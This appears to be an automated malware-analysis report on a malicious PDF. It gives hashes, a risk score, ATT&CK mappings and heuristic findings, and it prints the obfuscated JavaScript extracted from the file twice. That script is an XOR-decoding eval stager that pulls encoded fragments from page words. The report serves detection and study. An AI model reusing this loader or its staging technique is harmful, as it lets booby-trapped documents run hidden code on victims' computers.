PDF / .TXT malware analysis — malicious · 79b56e162b6b26cd

MALICIOUS

PDF / .TXT

4.6 KB

MD5: 093689fdceefc8582102d369589237c9 SHA-1: c9ad642afc096450fc1e9de54194ae9f5cf0bd36 SHA-256: 79b56e162b6b26cdac5d6ec9b498b5c6787b69a47280eab23bfbb8efcc08e281

86 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1566.001 Spearphishing Attachment

The PDF contains embedded JavaScript that is heavily obfuscated. The script decodes a string using XOR operations and then executes it. This pattern is typical for downloading and executing a second-stage payload. The ML classifier and heuristic firings strongly indicate malicious intent.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER

PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0011_000.js
725b7386f6e9caae9e03f9492eb7f26f190197c23637c755c72761214d6aafe9 pdf-javascript-stream PDF /JS object 11 at offset 0xC9C 852 bytes

Filename	Kind	Source	Size
`javascript_obj0011_000.js` `725b7386f6e9caae9e03f9492eb7f26f190197c23637c755c72761214d6aafe9`	pdf-javascript-stream	PDF /JS object 11 at offset 0xC9C	852 bytes
Preview script First 1,000 lines of the extracted script var gR="charUv3A".substr(0,4)+"CodeUKFI".substr(0,4)+"KrpAtrpK".substr(3,2);var p=62;var pK="subs"+"tr";var eT=this;function x(r,xO){return r^xO;};var aX="uneVmHA".substr(0,3)+"sca"+"pe";var t=1;var j="Rj5getP".substr(3)+"wYjageNjwY".substr(3,4)+"7UithWoi7U".substr(3,4)+"yXCrdyXC".substr(3,2);var d=new String();var f="Z45from".substr(3)+"dU2Char2Ud".substr(3,4)+"Code9aFO".substr(0,4);;var tA="xN5getPa".substr(3)+"3vSgeNum".substr(3)+"Words";var wH=String;var jA=["a","","p","p"];mB=new String(jA[0]+jA[2]+jA[2]+jA[1]);var b=["e","","a","l","v"];h=new String(b[0]+b[4]+b[2]+b[3]+b[1]);var n=4294-4294;var dM=91-89;;var aXY="XKw%".substr(3);var mB=eT[mB];var mJ=eT[aX];var v=eT[h];;var vA=eT[tA](t);for(var mR=n;mR<vA;mR++){rS=eT[j](t,mR);var aJ=rS[pK](rS.length-dM,dM);var z=aXY+aJ;var dS=mJ(z);var gN=dS[gR](n);var vAV=x(gN,p);d+=wH[f](vAV);}v(d);

Preview script

First 1,000 lines of the extracted script

var gR="charUv3A".substr(0,4)+"CodeUKFI".substr(0,4)+"KrpAtrpK".substr(3,2);var p=62;var pK="subs"+"tr";var eT=this;function x(r,xO){return r^xO;};var aX="uneVmHA".substr(0,3)+"sca"+"pe";var t=1;var j="Rj5getP".substr(3)+"wYjageNjwY".substr(3,4)+"7UithWoi7U".substr(3,4)+"yXCrdyXC".substr(3,2);var d=new String();var f="Z45from".substr(3)+"dU2Char2Ud".substr(3,4)+"Code9aFO".substr(0,4);;var tA="xN5getPa".substr(3)+"3vSgeNum".substr(3)+"Words";var wH=String;var jA=["a","","p","p"];mB=new String(jA[0]+jA[2]+jA[2]+jA[1]);var b=["e","","a","l","v"];h=new String(b[0]+b[4]+b[2]+b[3]+b[1]);var n=4294-4294;var dM=91-89;;var aXY="XKw%".substr(3);var mB=eT[mB];var mJ=eT[aX];var v=eT[h];;var vA=eT[tA](t);for(var mR=n;mR<vA;mR++){rS=eT[j](t,mR);var aJ=rS[pK](rS.length-dM,dM);var z=aXY+aJ;var dS=mJ(z);var gN=dS[gR](n);var vAV=x(gN,p);d+=wH[f](vAV);}v(d);

Open this report in the interactive analyzer, or submit your own file for analysis.